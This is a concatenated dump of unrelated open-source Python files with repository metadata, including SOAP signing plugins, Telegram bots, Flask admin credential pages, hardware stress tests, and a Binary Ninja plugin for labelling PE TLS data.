9a09ebfa2f810688ce7260dec841f4fdfca5030f | 1,418 | py | Python | src/aeat/zeep_plugins.py | initios/aeat-web-services | 3e9533c6f5675df679ea6b42b07304ba938ebcb5 | [
"MIT"
] | 7 | 2018-01-04T10:57:54.000Z | 2021-07-30T09:56:22.000Z | src/aeat/zeep_plugins.py | initios/aeat-web-services | 3e9533c6f5675df679ea6b42b07304ba938ebcb5 | [
"MIT"
] | 18 | 2018-01-04T10:27:01.000Z | 2018-02-20T13:56:19.000Z | src/aeat/zeep_plugins.py | initios/aeat-web-services | 3e9533c6f5675df679ea6b42b07304ba938ebcb5 | [
"MIT"
] | 2 | 2018-11-07T09:07:50.000Z | 2020-12-10T09:47:00.000Z | import logging
from lxml import etree
from zeep import Plugin
from aeat import utils, xml_signing
logger = logging.getLogger(__name__)
class RawXMLPlugin(object):
'''
Stores last request and response as str
'''
| 28.938776 | 84 | 0.669958 | import logging
from lxml import etree
from zeep import Plugin
from aeat import utils, xml_signing
logger = logging.getLogger(__name__)
class SignMessagePlugin(Plugin):
def __init__(self, cert_path, key_path):
self.cert_path = cert_path
self.key_path = key_path
def egress(self, envelope, http_headers, operation, binding_options):
'''Sign enveloped message'''
args = envelope[0][0], self.cert_path, self.key_path
signed = xml_signing.sign(*args)
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>{}</soapenv:Body>
</soapenv:Envelope>'''.format(
etree.tostring(signed).decode())
envelope = etree.fromstring(data)
return envelope, http_headers
class RawXMLPlugin(object):
'''
Stores last request and response as str
'''
def __init__(self):
self.last_sent = None
self.last_received = None
def ingress(self, envelope, http_headers, operation):
self.last_received = utils.lxml_to_string(envelope)
logging.info(self.last_received)
return envelope, http_headers
def egress(self, envelope, http_headers, operation, binding_options):
self.last_sent = utils.lxml_to_string(envelope)
logging.info(self.last_sent)
return envelope, http_headers
| 499 | 587 | 103 |
6378199739a1aed1222e18763f9208733ce55447 | 253 | py | Python | handlers/users/help.py | nomadroom/Media_Bot | 59f70d1f1cbda254e6cc0f6a10c88dd05456f797 | [
"MIT"
] | null | null | null | handlers/users/help.py | nomadroom/Media_Bot | 59f70d1f1cbda254e6cc0f6a10c88dd05456f797 | [
"MIT"
] | null | null | null | handlers/users/help.py | nomadroom/Media_Bot | 59f70d1f1cbda254e6cc0f6a10c88dd05456f797 | [
"MIT"
] | 1 | 2020-12-18T08:49:41.000Z | 2020-12-18T08:49:41.000Z | from aiogram import types
from data import config
from loader import dp
from utils.misc import rate_limit
@rate_limit(5, 'help')
@dp.message_handler(commands=['help'])
| 21.083333 | 41 | 0.774704 | from aiogram import types
from data import config
from loader import dp
from utils.misc import rate_limit
@rate_limit(5, 'help')
@dp.message_handler(commands=['help'])
async def help(message: types.Message):
await message.answer(config.HELP_MSG)
| 60 | 0 | 22 |
0299cbaad215befbf276c561c700aae7ec4b67af | 400 | py | Python | ProjectEuler/python/prob5.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | ProjectEuler/python/prob5.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | 1 | 2015-03-25T22:35:52.000Z | 2015-03-25T22:35:52.000Z | ProjectEuler/python/prob5.py | yuriyshapovalov/Prototypes | 1fc4af4434440a8f59a4bcb486e79fd53d199a7d | [
"Apache-2.0"
] | null | null | null | # projecteuler.net/problem=5
if __name__ == '__main__':
main()
| 19.047619 | 32 | 0.4625 | # projecteuler.net/problem=5
def main():
answer = SmallestMultiple()
print(answer)
def SmallestMultiple():
num = 1
while True:
found = True
for i in range(1, 20):
if num % i != 0:
found = False
break
if found:
return num
num = num + 1
if __name__ == '__main__':
main()
| 278 | 0 | 50 |
3c03c6604a634b3a6acbad3e149fefccfb24ec00 | 4,251 | py | Python | src/sardana/taurus/core/tango/sardana/test/test_measgrpstress.py | marc2332/sardana | 48dc9191baaa63f6c714d8c025e8f3f96548ad26 | [
"CC-BY-3.0"
] | 43 | 2016-11-25T15:21:23.000Z | 2021-08-20T06:09:40.000Z | src/sardana/taurus/core/tango/sardana/test/test_measgrpstress.py | marc2332/sardana | 48dc9191baaa63f6c714d8c025e8f3f96548ad26 | [
"CC-BY-3.0"
] | 1,263 | 2016-11-25T15:58:37.000Z | 2021-11-02T22:23:47.000Z | src/sardana/taurus/core/tango/sardana/test/test_measgrpstress.py | marc2332/sardana | 48dc9191baaa63f6c714d8c025e8f3f96548ad26 | [
"CC-BY-3.0"
] | 58 | 2016-11-21T11:33:55.000Z | 2021-09-01T06:21:21.000Z | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
import os
import uuid
from unittest import TestCase
from tango import DevState
from taurus import Device
from taurus.test.base import insertTest
from .test_pool import is_numerical
from sardana.pool.pooldefs import AcqSynchType
from sardana.taurus.core.tango.sardana.pool import registerExtensions
from sardana.tango.pool.test.base_sartest import SarTestTestCase
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="count with CT (software trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
| 43.377551 | 78 | 0.646201 | #!/usr/bin/env python
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
import os
import uuid
from unittest import TestCase
from tango import DevState
from taurus import Device
from taurus.test.base import insertTest
from .test_pool import is_numerical
from sardana.pool.pooldefs import AcqSynchType
from sardana.taurus.core.tango.sardana.pool import registerExtensions
from sardana.tango.pool.test.base_sartest import SarTestTestCase
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software trigger) and 0D",
elements=["_test_ct_1_1", "_test_0d_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (software start)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Start)
@insertTest(helper_name="stress_count",
test_method_doc="stress count with CT (hardware trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="_test_tg_1_1", synchronization=AcqSynchType.Trigger)
@insertTest(helper_name="stress_count",
test_method_doc="count with CT (software trigger)",
elements=["_test_ct_1_1"], repeats=100,
synchronizer="software", synchronization=AcqSynchType.Trigger)
class TestStressMeasurementGroup(SarTestTestCase, TestCase):
def setUp(self):
SarTestTestCase.setUp(self)
registerExtensions()
def stress_count(self, elements, repeats, synchronizer, synchronization):
if (elements == ["_test_ct_1_1", "_test_0d_1_1"]
and synchronizer == "_test_tg_1_1"
and synchronization == AcqSynchType.Trigger
and os.name == "nt"):
self.skipTest("fails on Windows")
mg_name = str(uuid.uuid1())
argin = [mg_name] + elements
self.pool.CreateMeasurementGroup(argin)
try:
mg = Device(mg_name)
mg.setSynchronizer(synchronizer, elements[0], apply=False)
mg.setSynchronization(synchronization, elements[0])
for i in range(repeats):
state, values = mg.count(.001)
self.assertEqual(state, DevState.ON,
"wrong state after measurement {}".format(i))
for channel_name, value in values.items():
msg = ("Value {} for {} is not numerical in "
"measurement {}").format(value, channel_name, i)
self.assertTrue(is_numerical(value), msg)
finally:
mg.cleanUp()
if os.name != "nt":
self.pool.DeleteElement(mg_name)
def tearDown(self):
SarTestTestCase.tearDown(self)
| 1,305 | 39 | 103 |
c968e0d7921d29de8adfe7443a130ae7c6d0a721 | 989 | py | Python | bot_functions.py | lozik4/telegram_forward_message_bot | c38938e9cc54c3e460c0da84f62788a028d59a7c | [
"MIT"
] | null | null | null | bot_functions.py | lozik4/telegram_forward_message_bot | c38938e9cc54c3e460c0da84f62788a028d59a7c | [
"MIT"
] | null | null | null | bot_functions.py | lozik4/telegram_forward_message_bot | c38938e9cc54c3e460c0da84f62788a028d59a7c | [
"MIT"
] | null | null | null | import config
import telebot
bot = telebot.TeleBot(config.BOT_TOKEN)
@bot.message_handler(commands=['start'])
@bot.message_handler(content_types=["text"])
if __name__ == '__main__':
bot.polling(none_stop=True) | 32.966667 | 111 | 0.613751 | import config
import telebot
bot = telebot.TeleBot(config.BOT_TOKEN)
@bot.message_handler(commands=['start'])
def welcome(message):
if int(message.chat.id) not in config.CHAT_LIST:
bot.send_message(config.OWNER_CHAT_ID, str(message.chat.id) + ': ' +
f"{message.text} {message.from_user.first_name} "
f"{message.from_user.last_name} "
f"{message.from_user.username} "
f"{message.chat.title}")
bot.send_message(message.chat.id, f"👍 Group registration request: {message.chat.title}, has been sent")
@bot.message_handler(content_types=["text"])
def forward_info_messages(message):
if int(message.chat.id) == int(config.OWNER_CHAT_ID):
try:
text=message.text
for chat_id in config.CHAT_LIST:
bot.send_message(chat_id, text)
except:
pass
if __name__ == '__main__':
bot.polling(none_stop=True) | 728 | 0 | 44 |
d3e6742cee38d98b12987dc06da9bcb0ebcd9f0c | 1,535 | py | Python | src/simulation.py | bok/AI-with-Pyke | f56314679b7ade698237e585152b52a81d8ffbd4 | [
"WTFPL"
] | 10 | 2016-03-23T10:14:17.000Z | 2022-01-18T09:04:02.000Z | src/simulation.py | mhbashari/AI-with-Pyke | f56314679b7ade698237e585152b52a81d8ffbd4 | [
"WTFPL"
] | null | null | null | src/simulation.py | mhbashari/AI-with-Pyke | f56314679b7ade698237e585152b52a81d8ffbd4 | [
"WTFPL"
] | 3 | 2016-01-18T04:42:20.000Z | 2019-11-09T19:36:23.000Z | #!/usr/bin/python2
# -*- coding: utf-8 -*-
#####################################################################
# This program is free software. It comes without any warranty, to #
# the extent permitted by applicable law. You can redistribute it #
# and/or modify it under the terms of the Do What The Fuck You Want #
# To Public License, Version 2, as published by Sam Hocevar. See #
# http://sam.zoy.org/wtfpl/COPYING for more details. #
#####################################################################
# A single simulation to run.
from agent import UAgent
from object import UObject
from universe import Universe
alice = UAgent( name='Alice',
can_do=['take', 'ask_if', 'ask_ref'],
goals=
[
(('know', 'Alice', ('location', 'pipo', 'Alice')),),
],
knowledge=[],
max_length_plan = 3
)
bob = UAgent( name='Bob',
can_do=['move', 'inform_if', 'inform_ref'],
goals=[],
knowledge=
[
('know', 'Bob', ('location', 'pipo', 0))
]
)
pipo = UObject('pipo')
uni = Universe(3)
uni.add(alice, 0)
uni.add(bob, 2)
uni.add(pipo, 0)
print(uni)
finished = False
i = 0
nb_iteration_max = 5
while not finished and i < nb_iteration_max:
print 'Itération %d' % i
uni.step()
i += 1
finished = uni.all_satisfied
if i == nb_iteration_max:
print 'Maximum number of iterations reached.'
| 26.465517 | 72 | 0.50684 | #!/usr/bin/python2
# -*- coding: utf-8 -*-
#####################################################################
# This program is free software. It comes without any warranty, to #
# the extent permitted by applicable law. You can redistribute it #
# and/or modify it under the terms of the Do What The Fuck You Want #
# To Public License, Version 2, as published by Sam Hocevar. See #
# http://sam.zoy.org/wtfpl/COPYING for more details. #
#####################################################################
# A single simulation to run.
from agent import UAgent
from object import UObject
from universe import Universe
alice = UAgent( name='Alice',
can_do=['take', 'ask_if', 'ask_ref'],
goals=
[
(('know', 'Alice', ('location', 'pipo', 'Alice')),),
],
knowledge=[],
max_length_plan = 3
)
bob = UAgent( name='Bob',
can_do=['move', 'inform_if', 'inform_ref'],
goals=[],
knowledge=
[
('know', 'Bob', ('location', 'pipo', 0))
]
)
pipo = UObject('pipo')
uni = Universe(3)
uni.add(alice, 0)
uni.add(bob, 2)
uni.add(pipo, 0)
print(uni)
finished = False
i = 0
nb_iteration_max = 5
while not finished and i < nb_iteration_max:
print 'Itération %d' % i
uni.step()
i += 1
finished = uni.all_satisfied
if i == nb_iteration_max:
print 'Maximum number of iterations reached.'
| 0 | 0 | 0 |
d23ecf42866090a56ff27064afd591e5b295d316 | 296 | py | Python | exercise063.py | AlissonRaphael/python_exercises | 3f1185c4f2fff24c9fa2ffd6b60f90599044c985 | [
"MIT"
] | null | null | null | exercise063.py | AlissonRaphael/python_exercises | 3f1185c4f2fff24c9fa2ffd6b60f90599044c985 | [
"MIT"
] | null | null | null | exercise063.py | AlissonRaphael/python_exercises | 3f1185c4f2fff24c9fa2ffd6b60f90599044c985 | [
"MIT"
] | null | null | null | n = int(input('---- Sequência Fibonacci ----\nInsira a quantidade de termos: '))
t1 = 0
t2 = 1
print('{} -> {}'.format(t1, t2), end='')
contador = 3
while contador <= n+1:
t3 = t1 + t2
print(' -> {}'.format(t3) if contador != n+1 else ' -> Fim', end='')
t1 = t2
t2 = t3
contador += 1
| 21.142857 | 80 | 0.537162 | n = int(input('---- Sequência Fibonacci ----\nInsira a quantidade de termos: '))
t1 = 0
t2 = 1
print('{} -> {}'.format(t1, t2), end='')
contador = 3
while contador <= n+1:
t3 = t1 + t2
print(' -> {}'.format(t3) if contador != n+1 else ' -> Fim', end='')
t1 = t2
t2 = t3
contador += 1
| 0 | 0 | 0 |
bcea2a15e3045a7bb54691ccb2044393f7af6f60 | 5,506 | py | Python | pages/admin_pages.py | wilsonpe66/server-backend | 16665d810fe1829f5dacc67f396b7cecf5af042f | [
"BSD-3-Clause"
] | 1 | 2019-09-26T04:00:55.000Z | 2019-09-26T04:00:55.000Z | pages/admin_pages.py | wilsonpe66/server-backend | 16665d810fe1829f5dacc67f396b7cecf5af042f | [
"BSD-3-Clause"
] | 2 | 2020-06-05T21:58:55.000Z | 2021-06-10T21:45:08.000Z | pages/admin_pages.py | wilsonpe66/server-backend | 16665d810fe1829f5dacc67f396b7cecf5af042f | [
"BSD-3-Clause"
] | 1 | 2019-09-26T03:55:06.000Z | 2019-09-26T03:55:06.000Z | import json
from flask import Blueprint, flash, Markup, redirect, render_template, request,\
session
from libs import admin_authentication
from libs.admin_authentication import authenticate_admin_login,\
authenticate_admin_study_access, get_admins_allowed_studies, get_admins_allowed_studies_as_query_set,\
admin_is_system_admin
from libs.security import check_password_requirements
from database.models import Researcher, Study
admin_pages = Blueprint('admin_pages', __name__)
# TODO: Document.
@admin_pages.route('/choose_study', methods=['GET'])
@authenticate_admin_login
@admin_pages.route('/view_study/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
@admin_pages.route('/data-pipeline/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
"""########################## Login/Logoff ##################################"""
@admin_pages.route('/')
@admin_pages.route('/admin')
@admin_pages.route("/logout")
@admin_pages.route("/validate_login", methods=["GET", "POST"])
def login():
""" Authenticates administrator login, redirects to login page if authentication fails. """
if request.method == 'POST':
username = request.values["username"]
password = request.values["password"]
if Researcher.check_password(username, password):
admin_authentication.log_in_admin(username)
return redirect("/choose_study")
else:
flash("Incorrect username & password combination; try again.", 'danger')
return redirect("/")
@admin_pages.route('/manage_credentials')
@authenticate_admin_login
@admin_pages.route('/reset_admin_password', methods=['POST'])
@authenticate_admin_login
@admin_pages.route('/reset_download_api_credentials', methods=['POST'])
@authenticate_admin_login
| 37.202703 | 115 | 0.710316 | import json
from flask import Blueprint, flash, Markup, redirect, render_template, request,\
session
from libs import admin_authentication
from libs.admin_authentication import authenticate_admin_login,\
authenticate_admin_study_access, get_admins_allowed_studies, get_admins_allowed_studies_as_query_set,\
admin_is_system_admin
from libs.security import check_password_requirements
from database.models import Researcher, Study
admin_pages = Blueprint('admin_pages', __name__)
# TODO: Document.
@admin_pages.route('/choose_study', methods=['GET'])
@authenticate_admin_login
def choose_study():
allowed_studies = get_admins_allowed_studies_as_query_set()
# If the admin is authorized to view exactly 1 study, redirect to that study
if allowed_studies.count() == 1:
return redirect('/view_study/{:d}'.format(allowed_studies.values_list('pk', flat=True).get()))
# Otherwise, show the "Choose Study" page
allowed_studies_json = Study.query_set_as_native_json(allowed_studies)
return render_template(
'choose_study.html',
studies=allowed_studies_json,
allowed_studies=allowed_studies_json,
system_admin=admin_is_system_admin()
)
@admin_pages.route('/view_study/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
def view_study(study_id=None):
study = Study.objects.get(pk=study_id)
tracking_survey_ids = study.get_survey_ids_and_object_ids_for_study('tracking_survey')
audio_survey_ids = study.get_survey_ids_and_object_ids_for_study('audio_survey')
participants = study.participants.all()
return render_template(
'view_study.html',
study=study,
patients=participants,
audio_survey_ids=audio_survey_ids,
tracking_survey_ids=tracking_survey_ids,
allowed_studies=get_admins_allowed_studies(),
system_admin=admin_is_system_admin()
)
@admin_pages.route('/data-pipeline/<string:study_id>', methods=['GET'])
@authenticate_admin_study_access
def view_study_data_pipeline(study_id=None):
study = Study.objects.get(pk=study_id)
return render_template(
'data-pipeline.html',
study=study,
allowed_studies=get_admins_allowed_studies(),
)
"""########################## Login/Logoff ##################################"""
@admin_pages.route('/')
@admin_pages.route('/admin')
def render_login_page():
if admin_authentication.is_logged_in():
return redirect("/choose_study")
return render_template('admin_login.html')
@admin_pages.route("/logout")
def logout():
admin_authentication.logout_loggedin_admin()
return redirect("/")
@admin_pages.route("/validate_login", methods=["GET", "POST"])
def login():
""" Authenticates administrator login, redirects to login page if authentication fails. """
if request.method == 'POST':
username = request.values["username"]
password = request.values["password"]
if Researcher.check_password(username, password):
admin_authentication.log_in_admin(username)
return redirect("/choose_study")
else:
flash("Incorrect username & password combination; try again.", 'danger')
return redirect("/")
@admin_pages.route('/manage_credentials')
@authenticate_admin_login
def manage_credentials():
return render_template('manage_credentials.html',
allowed_studies=get_admins_allowed_studies(),
system_admin=admin_is_system_admin())
@admin_pages.route('/reset_admin_password', methods=['POST'])
@authenticate_admin_login
def reset_admin_password():
username = session['admin_username']
current_password = request.values['current_password']
new_password = request.values['new_password']
confirm_new_password = request.values['confirm_new_password']
if not Researcher.check_password(username, current_password):
flash("The Current Password you have entered is invalid", 'danger')
return redirect('/manage_credentials')
if not check_password_requirements(new_password, flash_message=True):
return redirect("/manage_credentials")
if new_password != confirm_new_password:
flash("New Password does not match Confirm New Password", 'danger')
return redirect('/manage_credentials')
Researcher.objects.get(username=username).set_password(new_password)
flash("Your password has been reset!", 'success')
return redirect('/manage_credentials')
@admin_pages.route('/reset_download_api_credentials', methods=['POST'])
@authenticate_admin_login
def reset_download_api_credentials():
researcher = Researcher.objects.get(username=session['admin_username'])
access_key, secret_key = researcher.reset_access_credentials()
msg = """<h3>Your Data-Download API access credentials have been reset!</h3>
<p>Your new <b>Access Key</b> is:
<div class="container-fluid">
<textarea rows="1" cols="85" readonly="readonly" onclick="this.focus();this.select()">%s</textarea></p>
</div>
<p>Your new <b>Secret Key</b> is:
<div class="container-fluid">
<textarea rows="1" cols="85" readonly="readonly" onclick="this.focus();this.select()">%s</textarea></p>
</div>
<p>Please record these somewhere; they will not be shown again!</p>""" \
% (access_key, secret_key)
flash(Markup(msg), 'warning')
return redirect("/manage_credentials")
| 3,511 | 0 | 176 |
2a12aeb72a1c289e7972cf3e45dcc3adfaa7d325 | 471 | py | Python | app/webcamera.py | thomsen85/LegoPokerDealer | 89fbf0123d1f4463493801349ad8b5ab06705a83 | [
"MIT"
] | 4 | 2021-11-02T11:34:57.000Z | 2021-11-23T23:30:30.000Z | app/webcamera.py | thomsen85/LegoPokerDealer | 89fbf0123d1f4463493801349ad8b5ab06705a83 | [
"MIT"
] | 9 | 2021-11-16T22:59:17.000Z | 2021-11-17T16:59:51.000Z | app/webcamera.py | thomsen85/LegoPokerDealer | 89fbf0123d1f4463493801349ad8b5ab06705a83 | [
"MIT"
] | null | null | null | import cv2 | 26.166667 | 61 | 0.577495 | import cv2
class Webcamera:
def __init__(self):
self.cap = cv2.VideoCapture(0)
self.width = self.cap.get(cv2.CAP_PROP_FRAME_WIDTH)
self.height = self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
def get_frame(self):
if self.cap.isOpened():
ret, frame = self.cap.read()
return (ret, frame)
else:
return None
def __del__(self):
if self.cap.isOpened():
self.cap.release() | 363 | -5 | 103 |
b697b66b0470d29f2c00ec28a6bf80479e97e41a | 1,047 | py | Python | thelma/repositories/rdb/mappers/stocksamplecreationiso.py | fogathmann/TheLMA | ac330a0005da4fea2f1387da9ff9938611ad1481 | [
"MIT"
] | 1 | 2020-07-12T22:47:58.000Z | 2020-07-12T22:47:58.000Z | thelma/repositories/rdb/mappers/stocksamplecreationiso.py | papagr/TheLMA | d2dc7a478ee5d24ccf3cc680888e712d482321d0 | [
"MIT"
] | null | null | null | thelma/repositories/rdb/mappers/stocksamplecreationiso.py | papagr/TheLMA | d2dc7a478ee5d24ccf3cc680888e712d482321d0 | [
"MIT"
] | 1 | 2020-07-12T22:40:36.000Z | 2020-07-12T22:40:36.000Z | """
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Stock sample creation ISO mapper.
"""
from sqlalchemy.orm import relationship
from everest.repositories.rdb.utils import mapper
from thelma.entities.iso import ISO_TYPES
from thelma.entities.iso import IsoSectorPreparationPlate
from thelma.entities.iso import StockSampleCreationIso
__docformat__ = "reStructuredText en"
__all__ = ['create_mapper']
def create_mapper(iso_mapper, stock_sample_creation_iso_tbl):
"Mapper factory."
m = mapper(StockSampleCreationIso, stock_sample_creation_iso_tbl,
inherits=iso_mapper,
properties=dict(
iso_sector_preparation_plates=relationship(
IsoSectorPreparationPlate,
back_populates='iso',
cascade='all,delete,delete-orphan')),
polymorphic_identity=ISO_TYPES.STOCK_SAMPLE_GENERATION)
return m
| 33.774194 | 80 | 0.719198 | """
This file is part of the TheLMA (THe Laboratory Management Application) project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Stock sample creation ISO mapper.
"""
from sqlalchemy.orm import relationship
from everest.repositories.rdb.utils import mapper
from thelma.entities.iso import ISO_TYPES
from thelma.entities.iso import IsoSectorPreparationPlate
from thelma.entities.iso import StockSampleCreationIso
__docformat__ = "reStructuredText en"
__all__ = ['create_mapper']
def create_mapper(iso_mapper, stock_sample_creation_iso_tbl):
"Mapper factory."
m = mapper(StockSampleCreationIso, stock_sample_creation_iso_tbl,
inherits=iso_mapper,
properties=dict(
iso_sector_preparation_plates=relationship(
IsoSectorPreparationPlate,
back_populates='iso',
cascade='all,delete,delete-orphan')),
polymorphic_identity=ISO_TYPES.STOCK_SAMPLE_GENERATION)
return m
| 0 | 0 | 0 |
1db8e2d6ecfe2c414d16fb5ab0cc22df65dbf5d1 | 554 | py | Python | plynx/web/state.py | live-wire/plynx | ed29db2b7880ed512974cd98993587886763a5f5 | [
"Apache-2.0"
] | null | null | null | plynx/web/state.py | live-wire/plynx | ed29db2b7880ed512974cd98993587886763a5f5 | [
"Apache-2.0"
] | null | null | null | plynx/web/state.py | live-wire/plynx | ed29db2b7880ed512974cd98993587886763a5f5 | [
"Apache-2.0"
] | null | null | null | from plynx.db.service_state import get_master_state
from plynx.utils.common import JSONEncoder
from plynx.web.common import app, requires_auth, make_fail_response, handle_errors
@app.route('/plynx/api/v0/master_state', methods=['GET'])
@handle_errors
@requires_auth
| 30.777778 | 82 | 0.689531 | from plynx.db.service_state import get_master_state
from plynx.utils.common import JSONEncoder
from plynx.web.common import app, requires_auth, make_fail_response, handle_errors
@app.route('/plynx/api/v0/master_state', methods=['GET'])
@handle_errors
@requires_auth
def master_state():
try:
return JSONEncoder().encode({
'status': 'success',
'master_state': get_master_state()
})
except Exception as e:
app.logger.error(e)
return make_fail_response('Internal error: "{}"'.format(str(e)))
| 264 | 0 | 22 |
8dd65d8ff868d942dd315277a04f874fe386cf3e | 2,154 | py | Python | tls.py | 0x1F9F1/binja-msvc | be2577c22c8d37fd1e2e211f80b1c9a920705bd2 | [
"MIT"
] | 9 | 2019-02-08T10:01:39.000Z | 2021-04-29T12:27:34.000Z | tls.py | DatBrick/binja-msvc | 751ffc1450c569bad23ac67a761d0f1fbd4ca4c4 | [
"MIT"
] | 1 | 2019-07-04T20:09:57.000Z | 2019-07-12T11:10:15.000Z | tls.py | DatBrick/binja-msvc | 751ffc1450c569bad23ac67a761d0f1fbd4ca4c4 | [
"MIT"
] | 2 | 2019-03-03T13:00:14.000Z | 2020-05-01T05:35:04.000Z | from binaryninja import Symbol, Type, log
from binaryninja.enums import SymbolType
from .utils import BinjaStruct, read_pe_header, check_address
IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
| 46.826087 | 183 | 0.730269 | from binaryninja import Symbol, Type, log
from binaryninja.enums import SymbolType
from .utils import BinjaStruct, read_pe_header, check_address
IMAGE_TLS_DIRECTORY32_t = BinjaStruct('<IIIIII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
IMAGE_TLS_DIRECTORY64_t = BinjaStruct('<QQQQII', names = ('StartAddressOfRawData', 'EndAddressOfRawData', 'AddressOfIndex', 'AddressOfCallBacks', 'SizeOfZeroFill', 'Characteristics'))
def read_tls_directory(view, address):
if view.address_size == 4:
image_tls_directory_t = IMAGE_TLS_DIRECTORY32_t
elif view.address_size == 8:
image_tls_directory_t = IMAGE_TLS_DIRECTORY64_t
else:
raise NotImplementedError()
tls_directory, address = image_tls_directory_t.read(view, address)
return tls_directory, address
def label_tls(view):
pe = read_pe_header(view)
tls_data_directory = pe.OPTIONAL_HEADER.DATA_DIRECTORY[9]
if tls_data_directory.Size:
tls_directory, _ = read_tls_directory(view, view.start + tls_data_directory.VirtualAddress)
if tls_directory is not None:
tls_start_address = tls_directory['StartAddressOfRawData']
tls_end_address = tls_directory['EndAddressOfRawData']
if (tls_start_address < tls_end_address) and check_address(view, tls_start_address) and check_address(view, tls_end_address):
log.log_info('TLS Data @ 0x{0:X}'.format(tls_start_address))
view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_start_address, 'TlsData'))
view.define_user_data_var(tls_start_address, Type.array(Type.int(1, sign = False), tls_end_address - tls_start_address))
tls_index_address = tls_directory['AddressOfIndex']
if check_address(view, tls_index_address):
log.log_info('TLS Index @ 0x{0:X}'.format(tls_index_address))
view.define_user_symbol(Symbol(SymbolType.DataSymbol, tls_index_address, 'TlsIndex'))
view.define_user_data_var(tls_index_address, Type.int(4, sign = False))
| 1,591 | 0 | 46 |
c726280e9627ceab9a71757a18662167f8f69d59 | 4,097 | py | Python | api/modules/categories.py | petrstehlik/pyngShop | 61591b9982742bf9aad9a0e270737415e5649fbb | [
"MIT"
] | 1 | 2018-02-07T19:22:38.000Z | 2018-02-07T19:22:38.000Z | api/modules/categories.py | petrstehlik/pyngShop | 61591b9982742bf9aad9a0e270737415e5649fbb | [
"MIT"
] | null | null | null | api/modules/categories.py | petrstehlik/pyngShop | 61591b9982742bf9aad9a0e270737415e5649fbb | [
"MIT"
] | null | null | null | """
Author: Frederik Muller, xmulle20@stud.fit.vutbr.cz
Author: Matej Vido, xvidom00@stud.fit.vutbr.cz
Date: 04/2017
"""
import bcrypt
from flask import request
from bson import json_util, ObjectId
import pymongo
from slugify import slugify
from api import auth, db
from api.module import Module
from api.models.models import Category, CategoryException
from api.role import Role
